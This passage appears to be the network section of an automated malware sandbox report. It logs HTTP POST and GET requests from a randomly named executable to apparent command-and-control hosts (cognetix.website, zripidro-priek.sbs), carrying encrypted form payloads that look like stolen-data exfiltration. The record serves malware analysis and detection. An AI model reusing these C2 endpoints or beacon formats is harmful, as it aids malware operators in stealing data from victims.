                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 209
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.cognetix.website
                                                Referer: http://www.cognetix.website/qttd/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 55 74 71 68 71 35 55 31 4c 64 34 30 4d 75 48 49 72 37 48 30 6c 64 77 53 4f 4f 50 4e 69 57 50 59 73 6b 5a 36 74 36 44 32 45 50 59 5a 4f 77 36 70 56 75 4e 49 36 50 2b 37 61 48 4a 63 30 43 34 7a 76 41 6a 46 56 4c 6a 50 4c 5a 35 4e 59 49 63 45 64 55 44 2f 63 57 46 45 32 48 4c 62 70 55 4e 33 32 42 41 52 4c 74 54 4f 44 66 39 71 76 4b 55 6c 70 79 62 4e 34 71 78 2b 61 4b 43 6e 6f 38 6e 31 56 70 39 58 4f 72 61 58 31 54 57 6f 43 61 42 55 4a 78 42 2f 52 76 44 4d 67 45 39 42 61 4e 55 32 38 43 77 30 33 77 46 61 55 66 50 68 50 6f 53 30 6b 52 5a 78 62 57 49 31 77 6a 37 76 2f 4d 70 61 2f 6e 55 72 6e 79 51 3d
                                                Data Ascii: 66yHIJy0=Utqhq5U1Ld40MuHIr7H0ldwSOOPNiWPYskZ6t6D2EPYZOw6pVuNI6P+7aHJc0C4zvAjFVLjPLZ5NYIcEdUD/cWFE2HLbpUN32BARLtTODf9qvKUlpybN4qx+aKCno8n1Vp9XOraX1TWoCaBUJxB/RvDMgE9BaNU28Cw03wFaUfPhPoS0kRZxbWI1wj7v/Mpa/nUrnyQ=
                                                Nov 25, 2024 13:45:57.758435965 CET533INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:45:57 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549919209.74.64.59802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:45:59.116415977 CET792OUTPOST /qttd/ HTTP/1.1
                                                Host: www.cognetix.website
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 229
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.cognetix.website
                                                Referer: http://www.cognetix.website/qttd/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 55 74 71 68 71 35 55 31 4c 64 34 30 4e 4f 58 49 70 63 72 30 6b 39 77 52 42 75 50 4e 35 47 50 44 73 6c 6c 36 74 37 57 78 59 74 4d 5a 4e 51 71 70 57 76 4e 49 71 66 2b 37 4f 33 4a 5a 71 79 34 38 76 41 2f 7a 56 4a 33 50 4c 61 46 4e 59 4b 55 45 64 6e 37 67 64 47 46 47 2b 6e 4c 5a 6e 30 4e 33 32 42 41 52 4c 74 58 33 44 65 56 71 76 35 4d 6c 70 54 62 4f 32 4b 78 78 64 4b 43 6e 73 38 6e 78 56 70 39 35 4f 76 61 39 31 52 65 6f 43 61 78 55 4b 6a 70 2b 66 76 44 4b 39 30 38 4b 63 2f 64 61 7a 53 42 34 30 67 56 66 49 38 4f 55 44 2b 6a 65 2b 7a 52 5a 49 32 6b 4e 67 77 7a 59 75 38 49 7a 6c 45 45 62 35 6c 45 78 59 51 7a 7a 45 62 72 52 43 78 63 47 2b 42 4e 39 37 2b 45 4a
                                                Data Ascii: 66yHIJy0=Utqhq5U1Ld40NOXIpcr0k9wRBuPN5GPDsll6t7WxYtMZNQqpWvNIqf+7O3JZqy48vA/zVJ3PLaFNYKUEdn7gdGFG+nLZn0N32BARLtX3DeVqv5MlpTbO2KxxdKCns8nxVp95Ova91ReoCaxUKjp+fvDK908Kc/dazSB40gVfI8OUD+je+zRZI2kNgwzYu8IzlEEb5lExYQzzEbrRCxcG+BN97+EJ
                                                Nov 25, 2024 13:46:00.369699955 CET533INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:00 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549925209.74.64.59802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:01.782574892 CET1809OUTPOST /qttd/ HTTP/1.1
                                                Host: www.cognetix.website
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1245
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.cognetix.website
                                                Referer: http://www.cognetix.website/qttd/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 55 74 71 68 71 35 55 31 4c 64 34 30 4e 4f 58 49 70 63 72 30 6b 39 77 52 42 75 50 4e 35 47 50 44 73 6c 6c 36 74 37 57 78 59 74 55 5a 4f 6d 6d 70 56 4d 6c 49 70 66 2b 37 4e 33 4a 59 71 79 34 62 76 41 33 76 56 4a 36 79 4c 63 42 4e 5a 70 4d 45 62 57 37 67 55 47 46 47 68 58 4c 63 70 55 4e 59 32 42 77 64 4c 73 6e 33 44 65 56 71 76 34 38 6c 75 43 62 4f 30 4b 78 2b 61 4b 43 6a 6f 38 6e 4a 56 70 31 50 4f 76 65 48 31 69 47 6f 44 2b 64 55 49 57 31 2b 54 76 44 49 2b 30 39 4b 63 2f 42 46 7a 52 30 4a 30 68 51 77 49 38 32 55 47 4b 2f 45 6d 6e 6c 63 58 48 78 76 76 78 37 34 7a 72 73 43 75 6c 67 59 35 55 6f 67 55 77 66 6e 4c 4e 53 53 41 42 67 4b 6c 33 31 47 2b 70 42 42 54 6f 51 53 61 7a 63 36 6c 4f 53 35 67 59 6c 52 34 41 44 2b 42 52 55 7a 64 49 4e 64 6f 4f 79 4b 4e 4a 66 43 62 69 30 6c 69 4f 6d 64 65 57 68 56 47 62 63 33 6d 45 47 62 69 69 62 71 2b 75 6d 69 76 78 36 36 7a 39 57 47 4b 72 36 6d 46 51 46 67 34 74 74 2b 4c 53 35 43 44 31 4e 4b 2f 6c 31 7a 67 6d 4a 74 58 58 49 5a 72 73 6e 2f 41 [TRUNCATED]
                                                Data Ascii: 66yHIJy0=Utqhq5U1Ld40NOXIpcr0k9wRBuPN5GPDsll6t7WxYtUZOmmpVMlIpf+7N3JYqy4bvA3vVJ6yLcBNZpMEbW7gUGFGhXLcpUNY2BwdLsn3DeVqv48luCbO0Kx+aKCjo8nJVp1POveH1iGoD+dUIW1+TvDI+09Kc/BFzR0J0hQwI82UGK/EmnlcXHxvvx74zrsCulgY5UogUwfnLNSSABgKl31G+pBBToQSazc6lOS5gYlR4AD+BRUzdINdoOyKNJfCbi0liOmdeWhVGbc3mEGbiibq+umivx66z9WGKr6mFQFg4tt+LS5CD1NK/l1zgmJtXXIZrsn/AQ8nPd/Wv/rF1w4gXoIBuIDXYAVrATR8xys7IAWqVWohyE4yMyGe8l0LX/q+DisthVqQqUkZXiiKKnn0ONzQ5w5lFF4LJScM0joml5t6bCYaDRJTGPYVlq/gHxgDcSSCA9CtU9y886YYaXJg8KPqChb/Jhqf2YYz48NwXgjZwRTUnQ7LeGUu4i5dgPv8XeCnIraWID2XbQon3zkk7II8IWrvdjAGfzT9nH+BsFwuOFWL7XWajuvhyGRmf509cFYzpwAgwqUqJbmmIFv/5qBSAYI/IGtXR/qMZxsLKyu9z7H/2G0wDMhg886ipuNZyeTXl0rxBto8SACARprDbM0JgcR+H9PPa47LqILI995sjWbDeA+uNB8PnHDCtdAYjEvqZC5VfqzWw4C1HNhagK0X/tG6uibiTJT6dk9vazebV8GaqM45Gjn7QA4OfD0/dJflZE9VJrIZuuHEgJKG3weFjhltyAuqgkC4gKXCBsLPm9JyyaGL0BbrofTuAY0qJCl2XU6n1UpLe0MpmmZZzW2tpqd709r/IEBmJz5fhRH+VIMrZmzRCrqrhFjSr5Zm94SBsXzuD0MI9bFIK8o+HfrH2I1MBVygpzNcIFJ6pdnmWLzjtibiwu3mt3J+qm9U1dsC4sKn2LuST5ZSACJLNWTPECvJLZzhP89RHl7 [TRUNCATED]
                                                Nov 25, 2024 13:46:02.991245985 CET533INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:02 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.549931209.74.64.59802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:04.438564062 CET514OUTGET /qttd/?66yHIJy0=ZvCBpOBACo8OAP3s1LOntf8DB/mM6FnXsWNgstfKSYdbGQSfJ8wq0qnRN0l90UAeuSPeR5WzZqkUYpE1Yg3SfGIW8QzsnQZV+EE7c+vVMu1pn444qRf10NViSNzmoeqFEg==&kb0=y00p-fqpV0lDx HTTP/1.1
                                                Host: www.cognetix.website
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Nov 25, 2024 13:46:05.707319975 CET548INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:05 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.549947104.21.49.253802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:11.328955889 CET778OUTPOST /z4gi/ HTTP/1.1
                                                Host: www.zripidro-priek.sbs
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 209
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.zripidro-priek.sbs
                                                Referer: http://www.zripidro-priek.sbs/z4gi/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 67 71 7a 2b 63 4d 68 75 37 36 31 57 4f 6f 61 63 4a 39 6e 4b 48 58 43 46 57 6d 51 42 54 36 4a 56 31 61 32 59 2f 73 30 58 4d 64 2f 47 66 35 78 46 58 31 36 59 76 56 51 42 74 54 72 50 54 73 38 6f 42 38 68 79 57 67 42 41 61 38 31 78 6a 36 64 4d 76 71 63 68 61 73 52 6d 6b 4e 4d 6b 4f 30 54 68 35 4e 47 65 33 54 47 75 37 4f 39 43 7a 57 4e 43 62 71 59 30 4e 54 35 4d 2f 74 42 75 66 4a 50 37 6d 6f 32 31 36 77 6c 30 63 47 57 51 74 2b 67 50 78 57 5a 77 37 68 6b 6e 67 7a 49 62 39 53 34 6c 49 4b 5a 75 57 74 36 51 37 68 46 76 68 7a 30 4c 6e 6c 64 47 72 2b 44 76 54 57 6d 78 63 6e 6c 71 4c 6f 63 38 52 6c 4d 3d
                                                Data Ascii: 66yHIJy0=gqz+cMhu761WOoacJ9nKHXCFWmQBT6JV1a2Y/s0XMd/Gf5xFX16YvVQBtTrPTs8oB8hyWgBAa81xj6dMvqchasRmkNMkO0Th5NGe3TGu7O9CzWNCbqY0NT5M/tBufJP7mo216wl0cGWQt+gPxWZw7hkngzIb9S4lIKZuWt6Q7hFvhz0LnldGr+DvTWmxcnlqLoc8RlM=
                                                Nov 25, 2024 13:46:12.627779961 CET1236INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIHTPr4BZNyhn28sOynfY4kBZe%2FbGeyLo%2FY8C0dJAltL1PiBqfioUeI3OVp2R2NHHV7gkTcZyc%2B2IV1uLKn0zKSzUEQLmFnF6plF8aqeVVYsoF5RMKixyPWqf5VcdR7UinBQNnRjbVLT"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e81bd7e8a9b18fa-EWR
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                                                Nov 25, 2024 13:46:12.627860069 CET341INData Raw: 8a b4 86 35 ca 5c 50 08 77 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e f8 20 ef 8f 5b f9 f1 a4 da ec e9 57 70 bf 96 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a4 90 af 48 47 bd c1 b4 da ad e5 01 43 ba 0a 61 ec ea dc 29 64 b2 fe 2f 1a 3b 46 1e 16 52
                                                Data Ascii: 5\Pw"(o+J [WppZlOHGCa)d/;FR}dVfd]"fm%1 vbv+Y~ %cx0J]L$v i4Lm7ph%o$,Ak[[


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.549956104.21.49.253802140C:\Program Files (x86)\CQKsEEhyOOizKNIGCaAVAvlRIAuCPMNLqmOVIaLuhwlQVgnhnlCTRRjzLSOqqIBDc\RUaXGIhjtGYK.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 25, 2024 13:46:13.989463091 CET798OUTPOST /z4gi/ HTTP/1.1
                                                Host: www.zripidro-priek.sbs
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 229
                                                Connection: close
                                                Cache-Control: no-cache
                                                Origin: http://www.zripidro-priek.sbs
                                                Referer: http://www.zripidro-priek.sbs/z4gi/
                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                Data Raw: 36 36 79 48 49 4a 79 30 3d 67 71 7a 2b 63 4d 68 75 37 36 31 57 50 49 4b 63 50 63 6e 4b 47 33 43 47 61 47 51 42 63 61 4a 52 31 61 71 59 2f 74 41 48 50 76 62 47 52 38 4e 46 47 48 43 59 75 56 51 42 69 7a 72 4f 4d 38 39 6b 42 39 63 4e 57 68 39 41 61 38 68 78 6a 2b 5a 4d 76 64 78 54 62 38 52 6b 6f 74 4d 69 4b 30 54 68 35 4e 47 65 33 54 54 42 37 4b 5a 43 7a 6d 39 43 62 50 34 31 46 7a 35 54 34 74 42 75 62 4a 50 2f 6d 6f 33 50 36 30 45 62 63 41 53 51 74 36 6b 50 32 48 5a 7a 67 52 6b 68 6b 7a 4a 5a 39 41 35 2f 49 35 74 6c 66 76 7a 52 6d 67 68 70 67 46 46 68 39 48 56 75 34 65 76 58 44 46 75 47 4e 58 45 44 52 4c 4d 4d 50 79 59 64 35 42 38 4f 6d 4c 74 6a 71 65 72 78 47 62 76 67 6e 6e 65 65
                                                Data Ascii: 66yHIJy0=gqz+cMhu761WPIKcPcnKG3CGaGQBcaJR1aqY/tAHPvbGR8NFGHCYuVQBizrOM89kB9cNWh9Aa8hxj+ZMvdxTb8RkotMiK0Th5NGe3TTB7KZCzm9CbP41Fz5T4tBubJP/mo3P60EbcASQt6kP2HZzgRkhkzJZ9A5/I5tlfvzRmghpgFFh9HVu4evXDFuGNXEDRLMMPyYd5B8OmLtjqerxGbvgnnee
                                                Nov 25, 2024 13:46:15.268276930 CET1236INHTTP/1.1 404 Not Found
                                                Date: Mon, 25 Nov 2024 12:46:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q3aFGSB6341Slcs0lot%2FomwuC3emXHy8a5GvLzXYSlEpFaW2zENlMDREXAWIXHUd4%2FfiA8MOXfTp%2FZ7K8udiu%2BRYsj44UhpUiwjGsbNSrf%2F4TB38r9PVzuD%2Be1RhwMiEQHu%2FU5NXf1w4"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8e81bd8f2c410f74-EWR
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1626&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=134&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
